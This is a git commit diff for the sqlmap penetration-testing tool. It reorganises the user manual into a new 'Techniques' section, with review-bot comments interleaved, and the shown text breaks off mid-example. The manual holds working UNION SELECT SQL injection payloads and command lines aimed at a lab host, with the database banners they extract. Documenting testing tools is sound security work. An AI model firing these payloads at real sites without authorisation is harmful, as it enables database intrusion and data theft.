Major bug fix to correctly handle httplib.BadStatusLine exception.

Minor improvement to set by default in all HTTP requests the standard HTTP headers (Accept, Accept-Encoding, etc.).
Updated user's manual.
Bernardo Damele 2008-11-15 12:25:19 +00:00
parent 4bf1fcb8ec
commit 84cbc60659
5 changed files with 399 additions and 313 deletions


@ -38,12 +38,13 @@ for the latest version.</EM>
<UL> <UL>
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A> <LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Injection</A> <LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Techniques</A>
<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Fingerprint</A> <LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Injection</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Enumeration</A> <LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Fingerprint</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">File system access</A> <LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Enumeration</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Operating system access</A> <LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">File system access</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Miscellaneous</A> <LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Operating system access</A>
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Miscellaneous</A>
</UL> </UL>
<P> <P>
<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2> <H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
@ -360,11 +361,22 @@ Options:
--auth-cred=ACRED HTTP Authentication credentials, value: name:password --auth-cred=ACRED HTTP Authentication credentials, value: name:password
--proxy=PROXY Use a HTTP proxy to connect to the target url --proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
Injection: Injection:
--string=STRING String to match in page when the query is valid --string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value --dbms=DBMS Force back-end DBMS to this value
Techniques:
These options can be used to test for specific SQL injection technique
or to use one of them to exploit the affected parameter(s) rather than
using the default blind SQL injection technique.
--time-test Test for Time based blind SQL injection
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
Fingerprint: Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint -f, --fingerprint Perform an extensive database fingerprint
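Review bot: the new Techniques paragraph in the embedded help output is missing an article ("test for specific SQL injection technique"); suggest "test for a specific SQL injection technique". The `--delay=DELAY` line is also added here only on the new side although the prose for it ("The valid value is a float, for instance 0.5") already exists further down, so this block was already out of sync with the option parser; pasting the current `-h` output in place of hand-editing would keep the three new `--time-test`/`--union-test`/`--union-use` entries from drifting the same way.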
@ -381,9 +393,9 @@ Options:
--privileges Enumerate DBMS users privileges (opt: -U) --privileges Enumerate DBMS users privileges (opt: -U)
--dbs Enumerate DBMS databases --dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D) --tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D) --columns Enumerate DBMS database table columns (req:-T opt:-D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C, --dump Dump DBMS database table entries (req: -T, opt: -D,
--start, --stop) -C, --start, --stop)
--dump-all Dump all DBMS databases tables entries --dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate -D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate -T TBL DBMS database table to enumerate
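Review bot: the new `--columns` text `(req:-T opt:-D)` drops the spaces and commas every neighbouring entry uses (`(opt: -D)` for `--tables`, `(req: -T, opt: -D, -C, --start, --stop)` for `--dump`); suggest `(req: -T, opt: -D)` so the help output stays uniform.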
@ -413,9 +425,6 @@ Options:
server document root for the moment) server document root for the moment)
Miscellaneous: Miscellaneous:
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
--eta Retrieve each query output length and calculate the --eta Retrieve each query output length and calculate the
estimated time of arrival in real time estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0) -v VERBOSE Verbosity level: 0-5 (default 0)
@ -1031,9 +1040,23 @@ Connection: close
</P> </P>
<P>Note that the HTTP <CODE>User-Agent</CODE> header is tested against SQL <P>Note that the HTTP <CODE>User-Agent</CODE> header is tested against SQL
injection even if you do not overwrite the default sqlmap HTTP injection also if you do not overwrite the default sqlmap HTTP
<CODE>User-Agent</CODE> header value.</P> <CODE>User-Agent</CODE> header value.</P>
<P>Some sites perform a server-side check on the HTTP <CODE>User-Agent</CODE>
header value and fail the HTTP response if a valid <CODE>User-Agent</CODE> is
not provided, its value is not expected or its value is blocked by a web
application firewall or similar intrusion prevention system. In this case
sqlmap will show you a message as follows:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
to force the HTTP User-Agent header with option --user-agent or -a
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>HTTP <CODE>Basic</CODE> and <CODE>Digest</CODE> authentications</H3> <H3>HTTP <CODE>Basic</CODE> and <CODE>Digest</CODE> authentications</H3>
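Review bot: the change from "even if you do not overwrite" to "also if you do not overwrite" is a regression in wording; "even if" was correct and should be kept. The new paragraph presents a rejected User-Agent as the explanation for the quoted error, but that message is emitted on `httplib.BadStatusLine` (see the connect.py hunk below), which httplib raises whenever the server closes the connection without a status line or answers with something that is not HTTP at all; a blocked User-Agent is one cause among several. Suggest phrasing it as "one common cause is a server-side check on the User-Agent header" rather than stating it as the reason.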
@ -1172,7 +1195,161 @@ seven HTTP requests, the maximum to retrieve a query output character.</P>
request. The valid value is a float, for instance 0.5.</P> request. The valid value is a float, for instance 0.5.</P>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Injection</A> <H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Techniques</A>
</H2>
<H3>Test for Time Based Blind SQL injection</H3>
<P>Option: <CODE>--time-test</CODE></P>
<P>TODO</P>
<H3>Test for UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
</H2> </H2>
<H3>String match</H3> <H3>String match</H3>
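Review bot: `--time-test` is documented only as "TODO" under "Test for Time Based Blind SQL injection" while the option is already listed in the help output above; either describe what the option does or drop the subsection until the text exists, since this TODO ships in the user's manual. Second, this hunk titles the new section 5.2 "Techniques", yet the moved text still says "Refer to the Techniques section for details on this SQL injection technique", a pointer written when the text lived under Miscellaneous and meant the earlier section that describes the techniques; with two sections of that name the reference is ambiguous, so link it to the intended section by its anchor. Is README.html generated from README.sgml? The SGML hunk below carries the same edit line for line, and regenerating would avoid maintaining both by hand.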
@ -1369,7 +1546,7 @@ back-end database management system. If you do not know it, let sqlmap
automatically identify it for you.</P> automatically identify it for you.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Fingerprint</A> <H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Fingerprint</A>
</H2> </H2>
<H3>Extensive database management system fingerprint</H3> <H3>Extensive database management system fingerprint</H3>
@ -1584,7 +1761,7 @@ parsing library that fetches data from Chip Andrews'
<A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P> <A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Enumeration</A> <H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Enumeration</A>
</H2> </H2>
<H3>Banner</H3> <H3>Banner</H3>
@ -2664,7 +2841,7 @@ column names of the table then asks if the query can return multiple
entries and goes on.</P> entries and goes on.</P>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">File system access</A> <H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">File system access</A>
</H2> </H2>
<H3>Read a specific file content</H3> <H3>Read a specific file content</H3>
@ -2708,7 +2885,7 @@ inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
</P> </P>
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Operating system access</A> <H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Operating system access</A>
</H2> </H2>
<H3>Prompt for an interactive operating system shell</H3> <H3>Prompt for an interactive operating system shell</H3>
@ -2746,153 +2923,9 @@ $ exit
functionalities of SQL shell.</P> functionalities of SQL shell.</P>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Miscellaneous</A> <H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Miscellaneous</A>
</H2> </H2>
<H3>Test for UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H3>Estimated time of arrival</H3> <H3>Estimated time of arrival</H3>
<P>Option: <CODE>--eta</CODE></P> <P>Option: <CODE>--eta</CODE></P>

Binary file not shown.


@ -323,11 +323,22 @@ Options:
--auth-cred=ACRED HTTP Authentication credentials, value: name:password --auth-cred=ACRED HTTP Authentication credentials, value: name:password
--proxy=PROXY Use a HTTP proxy to connect to the target url --proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
Injection: Injection:
--string=STRING String to match in page when the query is valid --string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value --dbms=DBMS Force back-end DBMS to this value
Techniques:
These options can be used to test for specific SQL injection technique
or to use one of them to exploit the affected parameter(s) rather than
using the default blind SQL injection technique.
--time-test Test for Time based blind SQL injection
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
Fingerprint: Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint -f, --fingerprint Perform an extensive database fingerprint
@ -344,9 +355,9 @@ Options:
--privileges Enumerate DBMS users privileges (opt: -U) --privileges Enumerate DBMS users privileges (opt: -U)
--dbs Enumerate DBMS databases --dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D) --tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D) --columns Enumerate DBMS database table columns (req:-T opt:-D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C, --dump Dump DBMS database table entries (req: -T, opt: -D,
--start, --stop) -C, --start, --stop)
--dump-all Dump all DBMS databases tables entries --dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate -D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate -T TBL DBMS database table to enumerate
@ -376,9 +387,6 @@ Options:
server document root for the moment) server document root for the moment)
Miscellaneous: Miscellaneous:
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
--eta Retrieve each query output length and calculate the --eta Retrieve each query output length and calculate the
estimated time of arrival in real time estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0) -v VERBOSE Verbosity level: 0-5 (default 0)
@ -977,9 +985,21 @@ Connection: close
<p> <p>
Note that the HTTP <tt>User-Agent</tt> header is tested against SQL Note that the HTTP <tt>User-Agent</tt> header is tested against SQL
injection even if you do not overwrite the default sqlmap HTTP injection also if you do not overwrite the default sqlmap HTTP
<tt>User-Agent</tt> header value. <tt>User-Agent</tt> header value.
<p>
Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
not provided, its value is not expected or its value is blocked by a web
application firewall or similar intrusion prevention system. In this case
sqlmap will show you a message as follows:
<tscreen><verb>
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
to force the HTTP User-Agent header with option --user-agent or -a
</verb></tscreen>
<sect2>HTTP <tt>Basic</tt> and <tt>Digest</tt> authentications <sect2>HTTP <tt>Basic</tt> and <tt>Digest</tt> authentications
@ -1118,6 +1138,160 @@ It is possible to specify a number of seconds to wait between each HTTP
request. The valid value is a float, for instance 0.5. request. The valid value is a float, for instance 0.5.
<sect1>Techniques
<sect2>Test for Time Based Blind SQL injection
<p>
Option: <tt>--time-test</tt>
<p>
TODO
<sect2>Test for UNION SELECT query SQL injection
<p>
Option: <tt>--union-test</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION SELECT query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
